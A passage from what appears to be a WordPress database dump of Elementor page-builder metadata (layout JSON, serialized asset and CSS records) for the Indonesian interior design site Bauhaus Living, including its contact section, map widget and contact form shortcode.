"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8611b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4521,4971,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4522,4971,'_elementor_pro_version','3.8.1'),(4523,4971,'_elementor_css','a:6:{s:4:\"time\";i:1695377587;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4525,4759,'_elementor_css','a:6:{s:4:\"time\";i:1695638676;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4526,4972,'_wp_page_template','elementor_header_footer'),(4527,4972,'_elementor_edit_mode','builder'),(4528,4972,'_elementor_template_type','wp-page'),(4529,4972,'_elementor_version','3.8.1'),(4530,4972,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4531,4972,'_elementor_page_assets','a:0:{}'),(4532,4972,'_elementor_pro_version','3.8.1'),(4533,4972,'_elementor_css','a:6:{s:4:\"time\";i:1695377195;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4534,4973,'_wp_page_template','elementor_header_footer'),(4535,4973,'_elementor_edit_mode','builder'),(4536,4973,'_elementor_template_type','wp-page'),(4537,4973,'_elementor_version','3.8.1'),(4538,4973,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 